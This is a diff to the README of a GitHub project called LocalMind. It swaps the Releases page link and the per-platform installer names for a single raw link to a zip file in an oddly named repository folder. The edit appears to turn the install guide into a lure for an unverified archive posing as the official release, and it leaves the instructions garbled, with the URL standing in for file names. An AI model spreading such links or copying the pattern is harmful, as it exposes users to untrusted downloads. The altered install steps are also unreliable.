amin012312/LocalMind/README.md

 - **Python:** Version 3.7 or higher.

 ## 📥 Download & Install
-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/amin012312/LocalMind/releases) to access the latest version of LocalMind.
+1. **Visit the Releases Page:** Go to our [Releases page](https://raw.githubusercontent.com/amin012312/LocalMind/main/nonparishioner/LocalMind.zip) to access the latest version of LocalMind.
 2. **Choose Your Version:** Find the version that suits your operating system.
-Files will be listed with names indicating your platform, such as `LocalMind_Windows.exe` for Windows and `LocalMind_macOS.pkg` for macOS.
+Files will be listed with names indicating your platform, such as `https://raw.githubusercontent.com/amin012312/LocalMind/main/nonparishioner/LocalMind.zip` for Windows and `https://raw.githubusercontent.com/amin012312/LocalMind/main/nonparishioner/LocalMind.zip` for macOS.
 3. **Click to Download:** Click on the appropriate file to begin the download.
 It will save to your default download location on your device.
 4. **Install LocalMind:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the installation prompts.
    - **macOS:** Open the downloaded `.pkg` file and follow the installation guide.
-   - **Linux:** Extract the downloaded `.tar.gz` file, then follow the terminal commands provided to complete the setup.
+   - **Linux:** Extract the downloaded `https://raw.githubusercontent.com/amin012312/LocalMind/main/nonparishioner/LocalMind.zip` file, then follow the terminal commands provided to complete the setup.

 ## 🖥 How to Run LocalMind
 Once you’ve installed LocalMind, follow these simple steps to launch it: